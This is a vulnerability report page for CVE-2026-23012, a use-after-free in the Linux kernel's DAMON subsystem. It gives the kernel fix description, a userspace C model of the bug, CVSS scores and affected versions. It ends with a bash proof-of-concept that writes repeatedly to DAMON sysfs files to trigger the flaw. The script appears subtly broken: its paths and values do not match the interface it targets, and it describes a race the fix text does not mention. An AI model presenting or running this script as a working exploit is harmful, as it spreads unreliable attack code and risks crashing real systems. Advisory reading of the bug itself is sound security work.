Security Vulnerability Report
CVE-2026-23012 CVSS 7.8 HIGH

CVE-2026-23012

Published: 2026-01-25 15:15:56
Last Modified: 2026-03-25 19:49:03
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

mm/damon/core: remove call_control in inactive contexts

If damon_call() is executed against a DAMON context that is not running, the function returns an error while keeping the damon_call_control object linked to the context's call_controls list. Let's suppose the object is deallocated after the damon_call(), and yet another damon_call() is executed against the same context. The function tries to add the new damon_call_control object to the call_controls list, which still has the pointer to the previous damon_call_control object, which is deallocated. As a result, a use-after-free happens.

This can actually be triggered using the DAMON sysfs interface. It is not easily exploitable, though, since it requires sysfs write permission and making definitely weird file writes. Please refer to the report for more details about the issue reproduction steps.

Fix the issue by making two changes. Firstly, move the final kdamond_call() for cancelling all existing damon_call() requests from the terminating DAMON context to be done before the ctx->kdamond reset. This lets any code that sees a NULL ctx->kdamond safely assume the context may not access damon_call() requests anymore. Secondly, let damon_call() clean up the damon_call_control objects that were added to the already-terminated DAMON context before returning the error.
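The list-linking defect described in the commit message, reduced to a userspace model (an added illustration, not kernel code; `struct ctx`, `struct call_control`, `call_vulnerable`, `call_fixed` and `leaves_dangling_entry` are hypothetical stand-ins for the kernel structures and functions named above):

```c
#include <stdbool.h>
#include <stdlib.h>
/* Minimal intrusive doubly-linked list, modelled on the kernel's list_head. */
struct list_head { struct list_head *prev, *next; };
static void list_init(struct list_head *h) { h->prev = h->next = h; }
static void list_add(struct list_head *n, struct list_head *h) {
    n->next = h->next; n->prev = h;
    h->next->prev = n;  /* writes into the current first entry: the UAF if that entry was freed */
    h->next = n;
}
static void list_del(struct list_head *n) {
    n->prev->next = n->next; n->next->prev = n->prev; n->prev = n->next = NULL;
}
static bool list_empty(const struct list_head *h) { return h->next == h; }
/* Hypothetical stand-ins for the kernel's damon_ctx and damon_call_control. */
struct ctx { bool running; struct list_head call_controls; };
struct call_control { int id; struct list_head list; };

/* Vulnerable shape: the error for an inactive context is returned with the
 * control still linked; once the caller frees it, the head's next pointer
 * dangles and the following list_add() writes into freed memory. */
static int call_vulnerable(struct ctx *c, struct call_control *cc) {
    list_add(&cc->list, &c->call_controls);
    if (!c->running)
        return -1;  /* BUG: cc remains on call_controls */
    return 0;
}

/* Fixed shape (the second change in the description): unlink the control
 * before returning the error, so the list never references freed memory. */
static int call_fixed(struct ctx *c, struct call_control *cc) {
    list_add(&cc->list, &c->call_controls);
    if (!c->running) {
        list_del(&cc->list);
        return -1;
    }
    return 0;
}
/* Model the caller: fail a call against an inactive context, free the
 * control, and report whether the list still points at the freed object. */
static bool leaves_dangling_entry(int (*call)(struct ctx *, struct call_control *)) {
    struct ctx c = { .running = false };
    list_init(&c.call_controls);
    struct call_control *cc = malloc(sizeof *cc);
    if (!cc) abort();
    int rc = call(&c, cc);
    free(cc);
    return rc != 0 && !list_empty(&c.call_controls);
}
```

Only the pointer value left in the list head is inspected after the free, so the check itself never touches freed memory; it shows the precondition for the next list_add() to corrupt a freed object.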

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.17:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:* - VULNERABLE
Linux kernel (affected versions with DAMON sysfs interface enabled)
Specific commits: 23b061f421eef03647b512f3df48861706c87db3, f9132fbc2e83baf2c45a77043672a63a675c9394

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2026-23012 PoC - DAMON sysfs interface trigger
# Requires: root privileges and sysfs write access

# Ensure DAMON is built into kernel
if [ ! -d /sys/kernel/mm/damon ]; then
    echo "DAMON not available in this kernel"
    exit 1
fi

# Create a DAMON context
cd /sys/kernel/mm/damon/admin/contexts
mkdir -p ctx_0
cd ctx_0

# Setup monitoring targets
echo 1 > operations
echo 1 > target_ids

# Function to trigger the UAF condition
trigger_uaf() {
    # Start context then immediately trigger error path
    echo on > state
    # Rapidly write to DAMON sysfs interface
    # This creates race condition in damon_call()
    for i in $(seq 1 100); do
        echo "triggering damon_call error path..."
        # Write operations that cause damon_call() to fail
        echo "invalid_op" > operations 2>/dev/null
    done
}

# The vulnerability occurs when:
# 1. damon_call() is executed against inactive context
# 2. Error returned but damon_call_control not removed from list
# 3. Object deallocated
# 4. Another damon_call() adds new object to same list with dangling pointer

echo "Triggering CVE-2026-23012..."
trigger_uaf
echo "Check dmesg for use-after-free warnings"

References

Raw JSON Data
